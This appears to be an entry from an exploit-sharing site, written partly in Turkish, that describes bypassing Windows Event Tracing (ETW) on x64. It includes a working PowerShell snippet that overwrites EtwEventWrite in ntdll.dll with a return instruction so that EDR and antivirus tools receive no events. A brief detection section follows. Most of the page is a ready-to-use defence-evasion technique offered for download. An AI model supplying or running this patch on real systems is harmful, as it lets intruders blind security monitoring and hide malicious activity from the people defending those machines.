VULN REPORT
/
shellcode
/
ID: 263
Windows/x64 ETW Patch ile Shellcode Gorunmezligi
Summary
This entry details a vulnerability found in the target system. The exploit was published on 2026-07-21 and has garnered 38 views from the community. It is classified under the shellcode category. Users are advised to review the source code in the Detail tab for technical specifics.
exploit_263.txt
<div class="space-y-8 text-slate-800 font-sans leading-relaxed">
<div class="border-l-4 border-purple-500 pl-5 py-3 bg-purple-50/60 rounded-r-xl">
<p class="text-xs font-bold uppercase tracking-widest text-purple-700 mb-1">Modern Evasion - Windows x64 - ETW Patch</p>
<h2 class="text-2xl font-extrabold text-slate-900 leading-tight">Windows/x64 ETW Bypass - EtwEventWrite Patching</h2>
<p class="text-sm text-slate-600 mt-2">ETW, EDR ve guvenlik yazilimlarinin process aktivitesini izlemesini saglayan Windows mekanizmasidir. EtwEventWrite patch edilerek olay gunlugu uretimi durdurulabilir.</p>
</div>
<div>
<h3 class="text-xl font-bold text-slate-900 border-b border-slate-200 pb-2 mb-4">ETW Calisma Mantigi</h3>
<div class="bg-slate-900 text-slate-300 p-4 rounded-xl font-mono text-xs overflow-x-auto shadow-inner leading-5">
[Process calisir]
EtwEventWrite() cagrisi (ntdll.dll icinde)
ETW session'ina olay gonderilir
EDR/AV saglayicisi alir ve analiz eder
Patch yapilirsa:
EtwEventWrite() -> ret 0 (Olay uretilmez)
</div>
</div>
<div>
<h3 class="text-xl font-bold text-slate-900 border-b border-slate-200 pb-2 mb-4">PowerShell ETW Patch</h3>
<div class="bg-slate-900 text-cyan-300 p-4 rounded-xl font-mono text-xs overflow-x-auto shadow-inner leading-5">
$p = [byte[]] (0xC3) # ret
$ntdll = [Diagnostics.Process]::GetCurrentProcess().Modules |
Where-Object { $_.ModuleName -eq "ntdll.dll" }
$etwAddr = [Win32]::GetProcAddress(
[Win32]::LoadLibrary("ntdll.dll"), "EtwEventWrite")
[Win32]::VirtualProtect($etwAddr, 1, 0x40, [ref]0)
[Runtime.InteropServices.Marshal]::Copy($p, 0, $etwAddr, 1)
</div>
</div>
<div>
<h3 class="text-xl font-bold text-slate-900 border-b border-slate-200 pb-2 mb-4">Tespit</h3>
<div class="bg-slate-900 text-slate-300 p-4 rounded-xl font-mono text-xs overflow-x-auto shadow-inner leading-5">
Kernel ETW patch'lenemez (sadece user-mode)
Windows Defender Credential Guard ek koruma saglar
Event ID Microsoft-Windows-Kernel-EventTracing izlenmeli
</div>
</div>
</div>
Entry Stats
Views
38
Downloads
5
Comments
0